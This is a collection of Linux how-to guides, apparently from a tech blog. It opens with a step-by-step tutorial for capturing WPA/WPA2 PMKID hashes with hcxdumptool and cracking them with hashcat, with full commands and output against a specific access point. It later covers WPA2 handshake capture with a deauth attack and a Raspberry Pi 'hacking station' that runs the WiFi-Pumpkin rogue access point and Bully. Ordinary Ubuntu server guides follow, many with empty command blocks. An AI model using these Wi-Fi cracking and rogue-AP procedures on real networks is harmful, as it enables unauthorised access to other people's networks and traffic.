How To Install ALFA AWUS1900 Kali Linux 2018.4

How To Capture WPA/WPA2 PMKID Kali Linux 2018.4

In this guide i will use the new method to capture WPA/WPA2 PMKID.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack you do not need to capture a full EAPOL 4-way handshake. The new attack is performed on the RSNIE (Robust Security Network Information Element) of a single EAPOL frame.”

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Install Dependencies And Tools

1.1 Install dependence

sudo apt install libcurl4-openssl-dev libpcap0.8-dev zlib1g-dev libssl-dev

1.2 In order to use the new attack you need the following tools:

Download hcxdumptool, hcxtools and hashcat

sudo git clone https://github.com/ZerBea/hcxdumptool.git

sudo git clone https://github.com/ZerBea/hcxtools.git

sudo git clone https://github.com/hashcat/hashcat.git

1.3 Install hcxdumptool

cd hcxdumptool

1.3.a Create the installation

sudo make

1.3.b Start the installation

sudo make install

1.4.a Install hcxtools

cd ..
cd hcxtools/

1.4.b Create the installation 

sudo make

1.4.c Start the installation

sudo make install

1.5.a Install hashcat

cd ..
cd hashcat

1.5.b Create the installation

sudo make

1.5.c Start the installation

sudo make install

Step 2: Configure Network Card

2.1 Set network card in monitor mode

## Set interface down
sudo ip link set wlan0 down
 
## Set monitor mode
sudo iwconfig wlan0 mode monitor
 
## Set interface up
sudo ip link set wlan0 up

2.2 Confirm monitor mode (ALFA AWUS1900)

sudo iwconfig

root@GalaxyS9:~/hashcat# sudo iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=30 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~/hashcat# 

2.3 Kill the wpa_supplicant for wlan0

sudo wpa_cli terminate wlan0

oot@GalaxyS9:~/hashcat# sudo wpa_cli terminate wlan0
Selected interface 'wlan0'
OK
root@GalaxyS9:~/hashcat# 

Step 3: Use Airodump-ng to sniff nearby networks

3.1 Open a new terminal and run airodump-ng to find your target BSSID

sudo airodump-ng --ivs wlan0

## Or dump the capture to a file
sudo airodump-ng wlan0 --ivs --wps -w /root/Desktop/Dump01 --output-format csv

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
84:C9:B2:6A:9E:90  -38       21        3    0   1  130  WPA2 CCMP   PSK  HonnyP01

3.2 Open a new terminal and navigate to the hashcat directory and create a filtermode file with our Target BSSID

## Open hashcat directory
cd hashcat/

## Create the filtermode file and enter the targets BSSID 
## Target BSSID 84:C9:B2:6A:9E:90 ESSID HonnyP01 Chanel 1
## "echo "BSSID">filter.txt"

sudo echo "84C9B26A9E90">filter.txt

Step 4: Use Hcxdumptool To Catch PMKID From The Target

4.1 Lunch Hcxdumptool and write to cap01.pcapng and use the filermode file and only use chanel 5

sudo hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: e804100a061d
MAC ACCESS POINT.........: 18421de033b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64358
ANONCE...................: edcf48118ea4f0cfc15bf88ece2f38cad42b2e7b294f1db5d3288c7e477fb3b5

INFO: cha=3, rx=999, rx(dropped)=55, tx=32, powned=0, err=0

Let the tool run at least 10 minutes and If an AP receives the association request packet and supports sending PMKID you will see a message “FOUND PMKID”

[16:25:48 - 011] 12acf1e762A4 -> 84C9B26A9E90 <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [ASSOCIATIONRESPONSE, SEQUENCE 1416]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [FOUND PMKID]

4.2 Run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat

sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

root@GalaxyS9:~/hashcat# sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

reading from cap01.pcapng
                                                
summary:                                        
--------
file name....................: cap01.pcapng
file type....................: pcapng 1.0
file hardware information....: armv7l
file os information..........: Linux 4.14.79-v7+
file application information.: hcxdumptool 5.1.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
WDS packets..................: 2
beacons (with ESSID inside)..: 22
probe requests...............: 22
probe responses..............: 14
association requests.........: 1
association responses........: 1
reassociation responses......: 2
authentications (OPEN SYSTEM): 8
authentications (BROADCOM)...: 8
EAPOL packets................: 8
EAPOL PMKIDs.................: 1
best handshakes..............: 1 (ap-less: 0)

1 PMKID(s) written to cap01.16800
root@GalaxyS9:~/hashcat#

4.3 Validate the hash

cat cap01.16800

root@GalaxyS9:~/hashcat# cat cap01.16800
4a12770f5a10315f7a8a6e9cd311c9ca*1cb72c843c70*b0ca68623d4f*506f6e747553
root@GalaxyS9:~/hashcat# 

4.4 Crack the formatted pcapng with hashcat

./hashcat -m 16800 cap01.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

[s]tatus [p]ause [b]ypass heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 9ba69e3487f514214f1e0fa61ab78fb1*08863bdd2c95*a46cf...323464
Time.Started.....: Sun Dec 23 22:02:53 2018 (3 mins, 2 secs)
Time.Estimated...: Sun Dec 23 22:20:42 2018 (14 mins, 47 secs)
Guess.Mask.......: '?l?l?l?l?l?lt!' [10]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   289.5 kH/s (51.84ms) @ Accel:256 Loops:64 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 52101120/308915776 (16.87%)
Rejected.........: 0/52101120 (0.00%)
Restore.Point....: 52101120/308915776 (16.87%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3456-3520
Candidates.#1....: 'lwybcot!' -> 'yymytht!'
Hardware.Mon.#1..: Temp: 77c Fan: 55% Util: 99% Core:1822MHz Mem:4006MHz Bus:16

For a more detail guide on how to use hashcat please see the guide on how to use hashcat in windows.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Install ALFA AWUS1900 Kali Linux 2018.4

How To Install ALFA AWUS1900 Kali Linux 2018.4

Install ALFA AWUS1900 Kali Linux.

Alfa AWUS1900 is a quad antenna 802.11ac Wi-Fi USB receiver boasting router connection speeds of up to 1900 Mbps (1300 Mbps for 5 Ghz + 600 Mbps for 2.4 Gz).

It is compatible with Microsoft Windows 7, 8/8.1, and Windows 10, connects to the OS by USB 3.

Four transmit/four receive (4T4R) dual band antenna allows utilization of both 2.4 and 5 Ghz radio bands on 802.11ac routers for a combined max connect rate of 1900 mbps.

The antennas can be detached and extended or upgraded.

Step 1: Update the system

1.1 Update and upgrade

sudo apt-get update && apt-get upgrade

1.2 Update dependence

sudo apt-get dist-upgrade -y

Step 2: Install Chipset Drivers

2.1 Before we begin to install ALFA AWUS1900, confirm that the network card is connect to Kali Linux by displaying USB connected devices

sudo lsusb

root@GalaxyS9:~# sudo lsusb
Bus 004 Device 002: ID 0bda:8813 Realtek Semiconductor Corp. 
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 005: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 004: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 003: ID 0e0f:0008 VMware, Inc. 
Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
root@GalaxyS9:~# 

2.2 Install realtek chipset RTL8814U drivers

sudo apt install realtek-rtl88xxau-dkms

2.3 Reboot and reconnect

sudo reboot

2.4 Confirm that the card is installed and running

sudo ifconfig

root@GalaxyS9:~# sudo ifconfig 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.128  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fed0:e17a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d0:e1:7a  txqueuelen 1000  (Ethernet)
        RX packets 193  bytes 21265 (20.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 58  bytes 4527 (4.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 28  bytes 1596 (1.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28  bytes 1596 (1.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 5a:00:35:a3:b4:70  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@GalaxyS9:~# 

sudo iwconfig

root@GalaxyS9:~# sudo iwconfig
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=18 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~# 

2.5 If the above don’t work then install the packets bellow.

In the git directory you will find a dkms installation script, execute the script to fix the installation.

sudo apt install dkms &&
sudo apt-get install bc &&
sudo apt-get install build-essential && 
sudo apt-get install linux-headers-$(uname -r)
sudo git clone https://github.com/aircrack-ng/rtl8812au

Step 3: Set The Card In Monitor Mode

3.1 You have to set the monitor mode manually on the AWUS036ACH & AWUS1900

## Set interface down
sudo ip link set wlan0 down

## Set monitor mode
sudo iwconfig wlan0 mode monitor

## Set interface up
sudo ip link set wlan0 up

3.2 Confirm monitor mode

sudo iwconfig

root@GalaxyS9:~# iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:5.3 GHz  Tx-Power=18 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~# 

3.3 Test the card by sniffing nearby networks

sudo airodump-ng wlan0

CH  7 ][ Elapsed: 1 min ][ 2018-12-23 17:32                                         
                                                                                                                                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 84:C9:B2:6A:9E:90  -49        6        0    0   1  130  WPA2 CCMP   PSK  HonnyP01                                                                                                                                                   root@GalaxyS9:~# 

3.4 Changing adapter back to manged mode

## Set interface down
sudo ip link set wlan0 down

## Set managed mode
sudo iwconfig wlan0 mode managed

## Set interface up
sudo ip link set wlan0 up

Step 4: Optional Commands

4.1 Change TX power

sudo iwconfig wlan0 txpower 30

## OR

sudo iw wlan0 set txpower fixed 3000

4.2 Set channel manually

## Set channel 6, width 40 MHz: 
sudo iw wlan0 set channel 6 HT40-

## Set channel 149, width 80 MHz:
sudo iw wlan0 set freq 5745 80 5775

Conclusion

We have installed ALFA AWUS1900 on Kali Linux and change the mode to monitor mode on the network card

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Setup A Kali Linux Hacking Station On Raspberry Pi 3 Model B+

In this quick guide we are installing A Kali Linux Hacking Station On Raspberry Pi 3 Model B+.

To access the hacking station we are enabling SSH and auto longing for lightdm, for remote desktop connection i am installing Vino VCN.

Last we are installing and configuring WiFI Pumpkin a rouge access point platform.

Step 1: Download and Install Kali Linux Image

1.1 Download Kali Linux official Raspberry Pi image.

1.2 Extract the image from the zip file to a local folder.

1.3 Download and run Win32DiskImager our a similar application to load the image on the SD card.

1.4 Insert the SD card to the Raspberry Pi and power on the device.

Step 2: Connect to Kali Linux With SSH

2.1 Connect the Raspberry Pi to the LAN.

2.2 Scan your local network with Nmap to get the Raspberry’s IP address.

2.3 Start Putty and connect to the Kali Linux.

2.4 The default credentials is root for login and toor for the password.

Step 3: Configure Kali Linux

3.1 Change the root user password.

sudo passwd root

root@kali:/# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:/#

3.2 First update installed packages.

sudo apt-get update -y

3.3 Next upgrade installed packages.

sudo apt-get upgrade -y

3.4 Finally upgrade dependencies.

sudo apt-get dist-upgrade -y

Step 4: Enable Auto login Lightdm

4.1 Display default manager service.

sudo cat /etc/X11/default-display-manager

root@kali:~# cat /etc/X11/default-display-manager
/usr/sbin/lightdm
root@kali:~# 

4.2 Edit configuration file for lightdm.

sudo nano /etc/lightdm/lightdm.conf

4.3 Delete the comment characters (“#”) and change the autologin user to be “root”.

    autologin-user=root
    autologin-user-timeout=0

Exit & Save

4.4 Edit the PAM configuration file for lightdm.

sudo nano /etc/pam.d/lightdm-autologin

4.5 Remove the hash “#” in the line below.

# Allow access without authentication
auth      required pam_succeed_if.so user != root quiet_success

# Allow access without authentication
##auth      required pam_succeed_if.so user != root quiet_success

Exit & Save

4.6 Use the settings menu on the desktop to turn off the power savings options and lock screen options.

4.7 Reboot Kali Linux.

sudo reboot

4.8 Confirm that auto login is successful.

Step 5: Install Vino VNC server

5.1 Install the Vino VNC server.

sudo apt-get install vino -y 

5.2 Download and run the script below to configure the Vino server installation.

NOTE: Edit the script and change the password.

sudo git clone https://gist.github.com/jasonadsit/3a836c60f010bf655f82a99064341993

# Download and unpack the script and run the commands bellow

sudo cd 3a836c60f010bf655f82a99064341993
sudo nano fix-kali-vnc.sh
sudo chmod +x fix-kali-vnc.sh
sudo ./fix-kali-vnc.sh

NOTE: The Scrip will reboot the server when it is finished.

5.3 The installation script will create a auto start file for VINO “vino-server.desktop”.

## You can find the file in the directory bellow

sudo /root/.config/autostart/vino-server.desktop

5.4 Display listing sockets, Vino listening port is TCP port 5900.

sudo netstat -tupln

root@kali:~# sudo netstat -tupln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      454/sshd
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      555/vino-server
tcp6       0      0 :::22                   :::*                    LISTEN      454/sshd
tcp6       0      0 :::5900                 :::*                    LISTEN      555/vino-server
udp        0      0 0.0.0.0:68              0.0.0.0:*                           402/dhclient

5.5 Edit the desktop resolution on startup, open the “boot” directory and edit the “config.txt” file.

cd /boot/

sudo nano config.txt

5.6 Uncomment the “framebuffer_width” and the “framebuffer_height” parameter and set the resolution to 1024.

framebuffer_width=1900

## framebuffer_height
##     Console framebuffer height in pixels. Default is display height minus
##     overscan.
##
framebuffer_height=1024

Exit & Save

5.7 Reboot the device.

5.8 Confirm that the VNC server is working by connecting to the server with a VNC client.

Step 6: Configure WiFi Connection

6.1 Edit the network/interfaces configuration file.

sudo /etc/network/interfaces

# Add the code bellow. (Remove quotes)

auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-ssid "YourNetworkName"
wpa-psk "YourPassword"

Exit & Save

6.2 Reboot once more.

sudo reboot

Optional 1 : Install WiFi Pumpkin Rouge AP

1.1 Install WiFi Pumpkin dependencies.

sudo apt install -y python-pip
sudo pip install service_identity
sudo pip install scapy_http
sudo apt install mitmproxy

1.2 Download WiFi-Pumpkin.

sudo git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

1.3 Open WiFi Pumpkin directory.

cd WiFi-Pumpkin/

1.4 Add permission to the installer file.

sudo chmod +x installer.sh

1.5 Run the installer script.

sudo ./installer.sh --install

1.6 Run the WiFi-Pumpkin application.

sudo wifi-pumpkin

Optional 2: Install Bully

https://github.com/aanarchyy/bully

2.1 Install Pixiewps dependence.

sudo apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps

2.2 Download Bully.

sudo git clone https://github.com/aanarchyy/bully

2.3 Build the application.

cd bully*/
cd src/
sudo make

2.4 Install bully.

sudo make install

Optional 3: Install Full Kali Linux ‘Image

3.1 The process can take up to 6 hours and you need a 32 GB SD card.

sudo apt-get install kali-linux-full

Conclusion

We have installed a Kali Linux Hacking Station on Raspberry Pi 3 Model B+, enabled SSH and remote “desktop” connection.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Capturing WPA2-PSK Handshake Kali Linux 2018.4

In this lab i will show how to capture the WPA2 4 way handshake using Kali Linux and using hashcat to crack the captured file.

DISCLAIMER: This software/tutorial is for educational purposes
only. It should not be used for illegal activity. The author is not
responsible for its use or the users action.

Step 1: Enable Monitor Mode On a Supported WiFi Card

1.1.a Display wireless card





1.2 Enable monitoring mode





1.3 Display the new created virtual interface called wlan0mon





Step  2: Use Airodump To Capture Packets

2.1.a Start sniffing nearby trafic



Use the command below to sniff nearby trafic and save the captured packets in to a file



2.1.b Let it run a while and close the capture, the file will contain the bssid address and the channel

Step 3: Capture The WPA2-PSK Handshake

3.1 Use airodump-ng to record the traffic from a specific access point, copy the BSSID and the channel number from the file that we created in the last step



3.2.a Open a new terminal window and launch a deauth attack with aireplay-ng



3.2.b Go back to terminal 1, stop the capture when you capture the wpa handshake



3.2.c Stop the deauth attack in terminal 2

3.3.a Confirm the captured handshake with aircrack-ng





Step 4: Convert The Captured Cap File

4.1 The captured .cap file needs to be to hccapx format to be cracked, the hashcat team have created a site where you can upload and convert a WPA / WPA2 pcap capture file to a hashcat capture file.

Open https://hashcat.net/cap2hccapx/ and upload the file.

Please fallow the guide on how to crack the formatted file using hashcat in windows.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Install Kismet Kali Linux 2018.4

Step 1: Update And Install Dependencies

1.1.a Upgrade / Update



1.2.a Install  dependencies



1.2.b Install libusb



1.3.a Install Python add-ons



Step 2: Install And Configure Kismet

2.1.a Clone the repository and go to kismet directory





2.2.a Configure the installation



2.2.b Create the installation 



2.2.c Start the installation



Step 3: Start Kismet (ALFA AWUS1900)

3.1.a Put Your Wireless Card in Monitor Mode



3.1.b Start Kismet web UI





3.1.c Start Kismet with wlan0






How To Install Transmission Torrent Client Ubuntu 18.04 Bionic Beaver

Step 1: Install Transmission

1.1.a Upgrade / Update server



1.1.b Install Transmission 



Step 2: Configure Transmission

2.1.a Create Download folders for transmission



2.1.b Add user to Transmission group



2.1.c Change group ownership



2.1.d Set access permissions



2.2.a Stop Transmission daemon





2.2.b Edit Transmission configuration file







Exit & Save

2.2.c Start Transmission daemon



2.3.a Add default Transmission Web UI port  9091 to firewall



2.4.a Logon to the Transmission Web UI








How To Install uTorrent Server Ubuntu 18.04 Bionic Beaver

Step 1: Install uTorrent

1.1.a Run commands in root



1.1.b Update and upgrade the server



1.2.a Install dependency libraries



1.3.a Download uTorrent for Ubuntu



1.3.b Extract the file to /opt directory





1.3.c  Change the permission to uTorrent directory



1.3.d Create a link from uTorrent Server to /user/bin directory



1.4.a Start uTorrent



1.4.b Update the firewall rules to permit port 8080



1.4.c Logon to the uTorrent web client



The default username is admin, leave password field blank

Step 2: Configure the uTorrent Server

2.1.a Change the default user and password, go to settings then Web UI




How To Setup Plex Server Ubuntu 18.04 Bionic Beaver

Step 1: Install Plex Server

1.1a Import the repository’s GPG key



1.1.b Add the Plex APT repository to software repository



1.1.c Update system packages



1.2.a Install Plex



1.2.b Verify Plex service





Step 2: Create a UFW application profile

2.1.a Create a application profile for Plex firewall rules





Exit & Save

2.2.a Update the firewall profile



2.2.b Apply the new firewall rules





2.2.c Verify firewall rules





 

Step 3: Configure the Plex server

3.1 Create directories to store Plex media files



3.2 Authorize Plex user to access media files



3.3 Open the Plex web portal



NOTE: You need to be on the same network

Useful Commands

Stop Plex service



Start Plex service



Display status for Plex service






How To Install Webmin Ubuntu 18.04 Bionic Beaver

Step 1: Install Webmin

1.1 Run commands in root



1.2 Update and upgrade the server



1.3 Install Webmin package dependence



1.4 Download latest Webmin packages





1.5 Install file with DPKG





1.6 Add firewall rule for port 10000



1.7 Logon to Webmin from a browser with a sudo account



Step  2: Change Webmin default port

2.1 Edit Webmin configuration file



2.1.a Replace port 10000



Exit and Save

2.1.b Restart Webmin



2.1.c Verify Webmin Service



2.2 Add new firewall rule for Webmin



2.3 Remove default Webmin port rule (Port 10000)





2.3.a Delete rule



2.3.b Repeat for ipv6 rule

2.4 Login to Webmin on new port






How To Configure NTP Server Ubuntu 18.04 Bionic Beaver

Step 1: Configure NTPd Server

1.1 Run commands in root



1.2 Disable timesyncd



1.2.a Verify that timesyncd is disabled





1.3 Edit timesyncd.conf



1.3.a Remove hashtag from NTP statement



1.3.b Add your NTP server pool address



Exit and Save

1.4 Restart systemd-timesyncd



1.4.a Verify ntp pool change



Step 2: Allow NTPd traffic in firewall

2.1 Allow NTPd traffic in firewall








How To Configure Time Zone Ubuntu 18.04 Bionic Beaver

Step 1: Set and configure time zone

1.1 List available time zones



1.2 Set the time zone



1.3 Verify time and time zone








How To Update/Upgrade Ubuntu 18.04 Bionic Beaver

Step 1: Edit the repository config file

1.1 Edit Sources list





1.1.a Add the fallowing repos



Exit and Save

Step 2: Update/Upgrade

2.1 Update installed packages



2.2 Upgrade installed packages to the latest versions



2.3 Update dependencies



2.4 Auto-remove old files



Step 3: Reboot

3.1 Reboot the server






How To Set Hostname Ubuntu 18.04 Bionic Beaver

Step 1: Change hostname

1.1 Display hostname





1.1.a Set hostname



Step 2: Verify parameter change

2.1 Verify hostname change





2.2 Verify /etc/hostname





Exit

Step 3: Set static table lookup for hostname

3.1 Edit /etc/hosts





3.1.a Change the old hostname



Exit and Save

3.2 Check if the  “cloud.cfg” is installed (This part can be skipped if the file is missing)





3.2.a Edit cloud.cfg



3.2.b Change the preserve_hostname value from false to true



Exit and Save

Step 4: Verify with a reboot

4.1 Reboot to verify change



4.2 Verify hostname








How To Configure Firewall Ubuntu 18.04 Bionic Beaver

Step 1: Configure firewall (UFW)

1.1 Run commands in root



1.1.a Enable the firewall





Type “Y” to proceed

1.1.b Deny incoming traffic





1.1.c Allow outgoing traffic





1.2 Allow default SSH connection on port 22





NOTE: If you are using a different port then use the statement below





1.3 Check firewall status





Step 2: Deleting rules

2.1 Determine firewall rule





2.2 Delete rule



2.2.a Repeat for ipv6 rule

Useful firewall rules

Enable HTTP



Enable HTTPS



Deny HTTP



Allow specific range of TCP ports



Allow specific range of UDP ports



Allow specific IP Addresses



Allow specific IP Addresses from a subnet



Allow specific IP Addresses and port



Allow specific IP Addresses from a subnet and port



Allow trafic to a specific network interface



Reload firewall rules



Restart UFW






How To Install SSH Server Ubuntu 18.04 Bionic Beaver

Step 1: Install & Configure SSH Server

1.1 Install SSH server



1.1.a Edit SSH server configuration file



1.1.b Remove the hashtag from the port statement



Exit and Save

1.2 Restart SSH daemon



 1.3 Verify status





SSH server is read to be used on port 22

Step 2: Configure SSH Server

2.1 Change SSH Server port



2.1.a Change the port number



Exit and Save

2.1.b Restart the SSH service



2.1.c Verify status





SSH server is ready to be used on port 888

2.2 Disable the option to login in directly as root via SSH



2.2.a Change the PermitRootLogin parameter to no





Exit and Save

2.2.b Restart the SSH service



Useful Commands

SSH Service status



Restart SSH service



Stop SSH service



Start SSH service



Disable SSH service next boot



Enable SSH service next boot






How To Static IP Ubuntu 18.04 Bionic Beaver

Step 1: Set static IP address

1.1 List Netplan to see name of the configuration file





1.2.a Open the 50-cloud-init.yaml configuration file





1.2.b Edit the configuration file with your IP network parameters



Exit and Save

Step 2: Apply Netplan configuration

2.1 Apply settings



2.2 Optional: Debug the netplan apply command



2.3 Reconnect to the server with new IP

Step 3: Verify Connectivity

3.1 Check IP address



3.2 Check default route



3.3 Check internet connectivity



3.4 Check DNS






How To Create Root Account Ubuntu 18.04 Bionic Beaver

Step 1: Create a user

1.1 Run commands in root





1.2 Add user





Enter the user’s password twice

Press enter to fill the fields with default information



Enter Y then hit enter to continue

1.3 Add new user to sudo group





Step 2: Grant Root Privileges to the User

2.1 Edit /etc/sudoers



Find the following lines:



Add this line under “# User privilege specification”





Exit & Save

2.2 Reboot the server and log in with the new user



Step 3: Delete a user and home folder

3.1 Delete user and home folder








How To Install Webmin Ubuntu 16.04

Step 1: Install Webmin

1.1 Run commands in root



1.2 Update and upgrade the server



1.3 Install wget if you don’t have it



1.4 Edit apt source list







Exit and Save

1.5 Download the Webmin PGP key





1.6 Add the Webmin PGP key





1.7 Update the package list again





1.8 Install Webmin





1.9 Enable Webmin default port in firewall



1.10 Logon to Webmin from a browser with a sudo account



Step 2: Configure Webmin

2.1 Change Webmin default port, edit Webmin config









Exit and Save

2.2 Restart Webmin



2.3 Enable port in firewall



2.4 Remove old firewall rule









Repeat for ipv6 rule

2.5 Logon to Webmin on the new port



Useful Commands

Stop Webmin  service



Start Webmin service



Display status








How To Configure Firewall Ubuntu 16.04

Step 1: Configure firewall (UFW)

1.1 Run commands in root



1.2 Enable the firewall





1.3 Deny incoming traffic





1.4 Allow outgoing traffic





1.5 Allow default SSH connection on port 22





NOTE: If you are using a different port then use the statement below





1.6 Check firewall status





Step 2: Deleting rules

2.1 Determine firewall rule





2.2 Delete rule





Repeat for ipv6 rule

Useful firewall rules

Enable HTTP



Enable HTTPS



Deny HTTP



Allow specific range of TCP ports



Allow specific range of UDP ports



Allow specific IP Addresses



3.7 Allow specific IP Addresses from a subnet



Allow specific IP Addresses and port



Allow specific IP Addresses from a subnet and port



Allow trafic to a specific network interface






How To Install NTPd Ubuntu 16.04

Step 1: Install NTPd

1.1 Run commands in root



1.2 Run update / upgrade





1.3 Install NTP daemon





1.4 Configure NTP Server







Add a log file statement which will record all NTP server issues



Exit and Save

1.5 Restart ntpd



1.6 Verify ntpd for status information





1.7 Verify time and date





1.8 Allow NTPd traffic in firewall








How To Configure Time Zone Ubuntu 16.04

Step 1: Set and configure time zone

1.1  List available time-zones





1.2 Set the time zone





1.3 Verify time and time zone








How To Update/Upgrade Ubuntu 16.04

Step 1: Upgrade / Update installed packages

1.1 Update installed packages





1.2 Upgrade installed packages to the latest versions





1.3 Update dependencies





1.4 Auto-remove old files





1.5 Reboot






How To Change Hostname Ubuntu 16.04

Step 1: Change /etc/hostname

1.1 Display hostname





1.2 Set hostname



1.3 Verify hostname change





1.4 Verify /etc/hostname





Exit

Step 2: Set static table lookup for hostnames

2.1 Edit /etc/hosts





Change the old hostname to the new one



Exit and Save

2.2 Verify change





2.3 Reboot



2.4 Verify that changes work after reboot










How To Install OpenSSH Ubuntu 16.04

Step 1: Install OpenSSH

1.1 Install OpenSSH server



1.2 Edit SSH config file



1.3 Change SSH default port and remove the ‘#’  from the statement



Change the ssh port to 999



Disable root login for enhanced security

Change the ‘PermitRootLogin prohibit-password’ statement to ‘no’



Exit and Save

1.4 Restart  ssh service



1.5 Verify ssh service








How To Disable IPV6 Ubuntu 16.04

Step 1: Disable IPV6

2.1 Check if ipv6 is enabled

0 –> Enabled
1 –> Disabled





Output shows a value of 0, 0 = enable

2.2 Edit the sysctl.conf



Add the lines below at the end of the file





Exit and Save

2.3 Update kernel parameters





2.4 Verify that ipv6 is disable





Output shows a value of 1, 1 = disable




How To Set Static IP Ubuntu 16.04

Step 1: Set static IP address

1.1 Edit config file



1.2 Comment out



NOTE: Network card name can change depending on your installation

1.3 Copy and add the lines below:



Exit and Save

1.4 Restart init.d





1.5 Reboot the server



Step 2: Verify Connectivity

2.1 Verify IP address





2.2 Check default route



2.3 Check internet connectivity



2.4 Check DNS








How To Create A Root Account Ubuntu 16.04

Step 1: Create a user

1.1 Run commands in root





1.2 Add user





1.3 Add user to sudo group





Step 2: Grant Root Privileges to the User

2.1 Edit /etc/sudoers



Find the following lines:



Add this line under “# User privilege specification”





Exit & Save

2.2 Reboot the server and log in with the new user



Step 3: Delete a user and home folder

3.1 Delete user and home folder